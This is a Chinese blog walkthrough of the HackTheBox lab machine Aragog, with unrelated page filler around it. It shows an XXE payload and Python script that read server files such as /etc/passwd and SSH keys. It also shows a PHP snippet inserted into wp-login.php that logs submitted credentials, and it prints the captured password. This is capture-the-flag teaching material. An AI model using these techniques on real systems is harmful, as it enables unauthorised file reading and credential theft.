HackTheBox-Machines--Aragog

于 2024-06-06 11:27:19 发布
阅读量598 收藏 8
点赞数 5
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box XXE 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/139484960
版权
Aragog 测试过程

1 信息收集

NMAP

  服务器开启了 21、22、80端口

在这里插入图片描述

  

21 端口测试

  首先测试 21 端口,21端口开启了匿名登录

  ftp服务器上存在 test.txt 文件,test.txt 文件是 xml 格式。

在这里插入图片描述
在这里插入图片描述

80 端口测试

echo "10.129.97.250 aragog.htb" | sudo tee -a /etc/hosts

  80端口是 apache2 的默认页面,无可利用点

在这里插入图片描述

目录扫描

  扫描目录发现 /hosts.php 文件,页面返回无明显可利用点

在这里插入图片描述

2 XXE 漏洞测试

  总结之前收集到的信息,在 test.txt文件中,其内容是XML格式,可以尝试进行XML外部实体注入攻击

  抓取 /hosts.php 页面请求,change method,在请求体写入读取 /etc/passwd 的 payload

  在 /etc/passwd 文件发现两个用户:floriancliff

在这里插入图片描述

使用脚本自动化读取文件

import requests as rq
import sys

filename = sys.argv[1]

url = "http://aragog.htb/hosts.php"

data = """<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file://FD" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
""".replace("FD",filename)

print "Attempting with file " + filename +"\n#########\n"
r = rq.post(url, data=data)
print (r.text).split("for ")[1]

读取ssh密钥文件进行SSH登录

  cliff 用户没有SSH 密钥文件,发现 florian 用户密钥文件,使用密钥文件登录SSH

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3 权限提升

pspy 工具

  上传 pspy工具 监控Linux进程

  本地开启 httpserver

python3 -m http.server 8000

在这里插入图片描述

在这里插入图片描述

pspy 输出

  每五分钟启动一次的一组进程,调用 /root/restore.sh 恢复dev_wiki站点;
  wp-login.php 为UID = 1001在调用,然后每一分钟调用一次。

访问 http://aragog.htb/dev_wiki/

在这里插入图片描述

通过上面的pspy输出

  wp-login.py脚本正在登录到/dev_wiki/目录中的wp-login.php页面,如果可以抓到发送到 wp-login.php 页面的数据,那就可以获得登录的用户名和密码

在这里插入图片描述

  更改 wp-login.php 文件的内容,将提交给 wp-login.php 的数据转储到 request.log

<?php
$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('/tmp/request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
?>

在这里插入图片描述

  获得了passwd !KRgYs(JFO!&MTr)lf

在这里插入图片描述

  切换到 root 用户

在这里插入图片描述

李沉肩
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 495
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
No.124-HackTheBox-Linux-Aragog-Walkthrough渗透学习
qq_34801745的博客
06-05 383
** HackTheBox-Linux-Aragog-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/126 靶机难度:中级(4.8/10) 靶机发布日期:2018年7月21日 靶机描述: Aragog is not overly challenging, however it touches on several common real-world vulnerabilities, techniques and mis
【Vulnhub】之Aragog-1.0.2
zg_111的博客
04-11 701
wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码。所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容。浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的。继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh。等待片刻,成功获取到root权限,并在root目录下发现了。
HTB-Aragog
qq_53142368的博客
07-19 948
hack the box
2024 TI杯电子工程设计大赛工程资料
07-24
移植的驱动:TFTLCD屏幕、触控IC、AD9910(DDS)、SI5351(时钟发生芯片) 所有驱动的通信部分被优化和重写(不超频的情况下),实现外设最佳性能表现 开发的算法 优化算法(gd.h):实现二阶余弦退火梯度下降法 FFT相关(fft.h):高精度FFT采样分析(与SI5351配合实现) 软件解调AM和FM信号 通信相关(fpga_spi.h):实现与FPGA的私有协议(类SPI)通信 波形生成(fmam_gen.h):实现DDS产生FM、AM调制波形 实现DAC产生FM、AM调制波形 方波周期测量(app.c)
年终总结汇报PPT模板(15)三个文档.pptx
07-24
年终总结汇报PPT模板(15)三个文档.pptx
Dell H330 RAID至原厂HBA固件IT版Crossflash工具.zip
07-24
在IT领域,RAID(Redundant Array of Independent Disks,独立磁盘冗余阵列)是一种技术,用于提升硬盘存储系统的性能、可靠性和数据冗余。Dell H330是一款广泛使用的服务器级RAID控制器,它为用户提供了一种灵活的方式来管理服务器中的硬盘驱动器。"Crossflash"是将一种固件或配置应用于不兼容硬件的过程,但在这个场景中,它是将Dell H330 RAID卡的固件刷写成直通(IT,Independent Technology)模式。 直通模式是RAID控制器的一种工作模式,它允许系统直接与硬盘驱动器通信,而不需要RAID功能。这种模式通常用于不需要RAID级别的数据保护,而是追求极致性能的应用,例如数据库服务器或者高I/O需求的工作站。 在Dell H330上执行“Crossflash”到直通模式的操作,用户可以实现以下几点: 1. **性能提升**:直通模式消除了RAID控制器处理数据的额外步骤,理论上能提供更高的硬盘读写速度,对于不需要RAID功能的环境特别有益。 2. **降低成本**:使用直通模式时,用户无需购买额外的RAID
前端分析-202307110022
07-24
前端分析-202307110022
Visual Studio 2022的学习.pdf
07-24
Visual Studio 2022的学习.pdf
c语言课程设计-职工资源管理系统.rar
07-24
基于C语言、C++、C#的课程\毕业设计,可供学习参考。
使用15单片机做的传感器课设,传感器包括火焰,ds18B20,ds1302,数码管,DHT11等外设
07-24
其中用了iic和onewire总线
1985-2021年 全国金融银行分支机构数据库.zip
07-24
数据整理全国金融分支机构数据,整理现存的商业银行分支机构数据,以及包括注销、吊销的分支机构信息,数据总量为40多万条,来源于银监会金融许可证信息公示平台,根据国家企业的信用信息公示系统,获取了所有现存以及所有注销吊销的银行分支机构数据。 数据指标 银行名称、登记状态、法定代表人、注册资本、成立日期、核准日期、所属省份、所属城市、所属区县、电话、邮箱、统一社会信用代码、纳税人识别号、注册号、组织机构代码证、参保人数、企业类型、所属行业、曾用名、网址、企业地址、年报地址、经营范围
2006-2021年 全国地级市用电量统计数据.zip
07-24
全社会用电量是是指一二三各个产业等用电领域电能消耗的总量,包括工业用电,商业用电,居民用电、居民用电、公共设施以及​其他用电等。 用电量主要用于研究能源消费统计、生产设备和产品能耗、贸易能耗结算等方面,是非常重要的一个经济指标,以及能源消费​指标。 数据整理2006-2021年,06-19年统计数据来源于中国城市统计年鉴,19之后城市统计年鉴不在更新,所以20年和21年的数据从各省级统计年鉴、统计公报以及地级市统计年鉴中查询人工整理。 相关指标 地区、城市、年份、全社会用电量(亿千瓦时)​
个人单页简历素材-文艺单页04.docx
07-24
【简历模板】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
5.资产负债情况的饼图.html
最新发布
07-24
5.资产负债情况的饼图
6.研发投入与创新成果的散点图.html
07-24
6.研发投入与创新成果的散点图
vscode详解和各平台安装
07-24
vscode详解和各平台安装下载
C#十六进制数值显示组件
07-24
在IT行业中,尤其是在软件开发领域,C#是一种广泛使用的编程语言,它提供了丰富的库和工具来帮助开发者构建各种类型的应用程序。"C#十六进制显示控件"是一个专为C#设计的组件,用于在应用程序中以十六进制格式显示和编辑数据,类似于专业的十六进制编辑器如WinHex。这个控件对于需要处理二进制数据或进行低级别调试的工作场景特别有用。 十六进制显示控件的核心功能通常包括以下几点: 1. **数据可视化**:控件能够将内存中的二进制数据转换为可读的十六进制格式,使得程序员可以直观地查看和理解数据的内容。这在处理非ASCII字符、原始二进制文件或内存缓冲区时尤其重要。 2. **编辑功能**:除了显示,控件还允许用户编辑十六进制表示的数据。这可能包括插入、删除、替换等操作,支持对单个字节或者选定范围的修改。 3. **地址栏**:类似于WinHex,控件通常会显示一个地址栏,显示当前数据相对于文件或内存起始位置的偏移量,这对于理解和定位数据位置非常有帮助。 4. **搜索与查找**:提供搜索功能,可以按十六进制值或字符串进行查找,支持查找下一个和替换功能,便于快速定位特定数据。 5.
WordPress风格化主题:仿效Hao123网址导航模板
07-24
说明: 可直接安装主题,作为单页导航使用,暂无文章页面模板。 还可以用daohang.php当作页面模板使用,集成到现在WP主题中 。 使用方法:(安装前请先备份) 1.直接安装 在后台直接安装主题即可。 2.集成到现在主题。(推荐) 仅需上传daohang.php文件和css文件夹到现在主题目录下。 然后取functions.php中添加挂件和菜单函数,添加到现有主题functions.php中即可。 然后在后台新建页面,使用[网址导航]模板,新建页面仅需填写标题即可。 再设置>阅读>首页显示>一个静态页面(在下方选择)>主页:选择上面建立的页面即可。 3.主题安装或集成后 在后台添加菜单或链接即可,链接请看小工具页面说明。 主题优点: 纯净绿色,仅调用菜单和链接,对网站无任何影响。 无需插件。。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值